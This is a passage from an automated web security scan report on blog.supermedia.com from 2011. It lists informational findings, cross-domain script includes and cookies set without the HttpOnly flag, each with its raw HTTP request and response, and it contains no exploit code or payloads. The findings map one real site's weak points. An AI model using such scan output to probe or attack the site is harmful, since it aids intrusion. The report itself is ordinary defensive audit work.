<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Blog | SuperMedia.com</title>

<link rel="alternate" type="application/rss+xml"
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

3.14. http://blog.supermedia.com/archives/newsletters/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /archives/newsletters/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /archives/newsletters/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:32 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:32 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Blog | SuperMedia.com</title>

<link rel="alternate" type="application/rss+xml"
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

3.15. http://blog.supermedia.com/archives/press-releases/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /archives/press-releases/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /archives/press-releases/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:33 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:33 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Blog | SuperMedia.com</title>

<link rel="alternate" type="application/rss+xml"
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

3.16. http://blog.supermedia.com/archives/tips/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /archives/tips/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /archives/tips/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:34 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:34 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Blog | SuperMedia.com</title>

<link rel="alternate" type="application/rss+xml"
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

4. Cookie without HttpOnly flag set  previous  next
There are 23 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



4.1. http://blog.supermedia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: blog.supermedia.com
Proxy-Connection: keep-alive
Referer: http://www.supermedia.com/social-responsibility/corporate-governance
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296763650|check#true#1296761850; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:36:38 GMT
Server: Unspecified
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:51:38 GMT;path=/
Cache-Control: private
Content-Length: 30628


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Blog | SuperMedia.com</title>

<link rel="alternate" type="application/rss+xml"
...[SNIP]...

4.2. http://blog.supermedia.com/2011/01/2011-changes/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /2011/01/2011-changes/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2011/01/2011-changes/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:18 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:18 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Changes to Look for in 2011 | SuperMedia Blog | SuperMedia.com</title>

<link rel="alternat
...[SNIP]...

4.3. http://blog.supermedia.com/2011/01/allowing-employees-to-work-from-home-could-be-a-win-win-for-your-business/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /2011/01/allowing-employees-to-work-from-home-could-be-a-win-win-for-your-business/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2011/01/allowing-employees-to-work-from-home-could-be-a-win-win-for-your-business/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:26 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:26 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title> Allowing Employees to Work Remotely Could be a Win-Win for Your Business | SuperMedia Blog |
...[SNIP]...

4.4. http://blog.supermedia.com/2011/01/getting-in-shape-tips/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /2011/01/getting-in-shape-tips/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2011/01/getting-in-shape-tips/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:18 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:18 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>3 Tips For Getting in Shape While Running a Business | SuperMedia Blog | SuperMedia.com</titl
...[SNIP]...

4.5. http://blog.supermedia.com/2011/01/how-to-use-op-ed-pages-to-promote-your-business/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /2011/01/how-to-use-op-ed-pages-to-promote-your-business/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2011/01/how-to-use-op-ed-pages-to-promote-your-business/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:16 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:16 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>How to Use Op-Ed Pages to Promote Your Business | SuperMedia Blog | SuperMedia.com</title>

...[SNIP]...

4.6. http://blog.supermedia.com/2011/01/starting-a-social-enterprise/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /2011/01/starting-a-social-enterprise/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2011/01/starting-a-social-enterprise/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:28 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:28 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Starting A Social Enterprise | SuperMedia Blog | SuperMedia.com</title>

<link rel="alterna
...[SNIP]...

4.7. http://blog.supermedia.com/2011/01/videos-will-help-your-small-business/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /2011/01/videos-will-help-your-small-business/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2011/01/videos-will-help-your-small-business/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:17 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:17 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>How Videos Will Help Your Small Business | SuperMedia Blog | SuperMedia.com</title>

<link
...[SNIP]...

4.8. http://blog.supermedia.com/2011/02/build-brand/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /2011/02/build-brand/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2011/02/build-brand/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:15 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:15 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Upping Your Brand in 2011 | SuperMedia Blog | SuperMedia.com</title>

<link rel="alternate"
...[SNIP]...

4.9. http://blog.supermedia.com/2011/02/go-marketing/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /2011/02/go-marketing/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2011/02/go-marketing/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:15 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:15 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Go Guerrilla with Your Marketing | SuperMedia Blog | SuperMedia.com</title>

<link rel="alt
...[SNIP]...

4.10. http://blog.supermedia.com/2011/02/planning-appreciation-events/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /2011/02/planning-appreciation-events/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2011/02/planning-appreciation-events/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:15 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:15 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Planning Appreciation Events | SuperMedia Blog | SuperMedia.com</title>

<link rel="alterna
...[SNIP]...

4.11. http://blog.supermedia.com/2011/02/should-you-loan-money-to-employees/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /2011/02/should-you-loan-money-to-employees/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2011/02/should-you-loan-money-to-employees/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:15 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:15 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Should You Loan Money to Your Employees? | SuperMedia Blog | SuperMedia.com</title>

<link
...[SNIP]...

4.12. http://blog.supermedia.com/archives/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /archives/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /archives/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:30 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:30 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Blog | SuperMedia.com</title>

<link rel="alternate" type="application/rss+xml"
...[SNIP]...

4.13. http://blog.supermedia.com/archives/news/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /archives/news/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /archives/news/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:31 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:31 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Blog | SuperMedia.com</title>

<link rel="alternate" type="application/rss+xml"
...[SNIP]...

4.14. http://blog.supermedia.com/archives/newsletters/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /archives/newsletters/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /archives/newsletters/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:32 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:32 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Blog | SuperMedia.com</title>

<link rel="alternate" type="application/rss+xml"
...[SNIP]...

4.15. http://blog.supermedia.com/archives/press-releases/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /archives/press-releases/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /archives/press-releases/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:33 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:33 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Blog | SuperMedia.com</title>

<link rel="alternate" type="application/rss+xml"
...[SNIP]...

4.16. http://blog.supermedia.com/archives/tips/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /archives/tips/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /archives/tips/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:34 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:34 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Blog | SuperMedia.com</title>

<link rel="alternate" type="application/rss+xml"
...[SNIP]...

4.17. http://blog.supermedia.com/comment_form.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /comment_form.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /comment_form.php HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:34 GMT
Server: Unspecified
Content-Length: 37
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:34 GMT;path=/

You+must+enter+a+valid+email+address.

4.18. http://blog.supermedia.com/comment_html.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /comment_html.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /comment_html.php HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

